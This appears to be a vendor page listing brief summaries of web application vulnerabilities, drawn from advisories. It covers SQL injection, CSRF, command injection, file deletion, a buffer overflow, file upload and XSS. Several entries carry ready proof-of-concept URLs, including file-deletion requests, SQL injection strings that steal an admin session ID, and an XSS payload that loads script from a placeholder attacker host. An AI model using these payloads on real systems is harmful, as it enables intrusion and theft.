An attacker can inject malicious SQL queries into the vulnerable parameter 'subid' of the 'showtest.php' script, which can be used to access or modify the database.
When an admin clicks on a malicious link, an attacker can login as a new Administrator with the credentials detailed below.
A vulnerability exists in Sun Secure Global Desktop & Oracle Global desktop due to improper validation of user-supplied input in the 'modules.cgi' script. An attacker can exploit this vulnerability to execute arbitrary commands on the vulnerable system with the privileges of the web server. The vulnerability is due to the 'modules.cgi' script not properly sanitizing user-supplied input to the 'module' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing shell metacharacters to the vulnerable script. This can allow the attacker to execute arbitrary commands on the vulnerable system with the privileges of the web server.
Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS. The command injection attack works by sending a malicious URL to an authenticated user (let's say the admin). If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them.
This exploit allows an attacker to add an admin user to the Dream Gallery application. The attacker can craft a malicious HTML page with a form that submits a POST request to the usuario.php page with the action parameter set to 'incluir'. The form includes the parameters user_login, user_password, and user_email, which are used to create the admin user. When a victim visits the malicious page, the form is automatically submitted and the admin user is created.
It is possible to remotely delete arbitrary files on the webserver on wordpress blogs that have simple-backup plugin installed and enabled. No authentication is required, the default configuration of simple-backup is affected. Example 1 : Delete 'pizza.txt' in wordpress root : http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt Example 2 : Delete .htaccess file protecting the backup folder : http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting Note : When 'download_backup_file' parameter is provided with an invalid filepath, the PHP script exits prematurely with message 'Access Denied!' and so does not regenerate automaticaly the .htaccess file. After this request, it may be possible (depending on the web server configuration) to browse the backup directory and download server backup files at this URL : http://127.0.0.1/<WP-path>/simple-backup/ The backup archive files may contain all the wordpress files : configuration files (wp-config.php etc.), PHP source code, etc.
For each new connection, websockify forks and calls the function do_handshake() to receive a client's WebSocket handshake. The following excerpt shows some of the source code responsible for receiving the client's data from the socket file descriptor: The function ws_recv() reads data from the socket file descriptor into the buffer handshake. The loop reads up to 4096 bytes of data from the socket and stores it in the buffer. The loop is limited to 10 iterations, which means that up to 40960 bytes of data can be read from the socket. The buffer is not checked for size before the data is written to it. This can be used to trigger a buffer overflow.
A vulnerability within the Relay Ajax Directory Manager web application allows unauthenticated attackers to upload arbitrary files to the web server running the web application. While the web application itself is mostly written in PHP, it also utilizes the Perl script 'upload.pl' for handling uploads initiated by the user. Uploading is a multi-step process: 1. The user initiates a multipart/form-data upload request through the web application. This request is sent to the Perl script and the following steps are handled by it. 2. A temporary file containing the entire request (including headers) is created. This temporary file is named partly by the first URL parameter, as shown in the following listing. 3. The headers and the POST body of the request are parsed and filtered to determine the final filename. 4. The upload is written to the final destination. 5. A file containing statistics about the upload process is written to the same directory.
Liferay is vulnerable to a stored XSS when an user is created with an malicious payload on the FirstName field. The javascript payload is executed when another user tries to use the profile search section.
PoC URLs for SQL Injection: For determining database, user and version: http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1 http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1 http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1 For steal admin's session ID (If admin is not online, page response with attack detected string. If online, response with admin's session ID): http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON %23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1 PoC URLs for XSS: Add a new admin to website silently while admin checking SecurityCheck logs: http://website/index.php?option=<script>var script = document.createElement('script');script.src = "http://ATTACKER/attack.js";document.getElementsByTagName('head')[0].appendChild(script);</script> attack.js: https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca
Services By CQR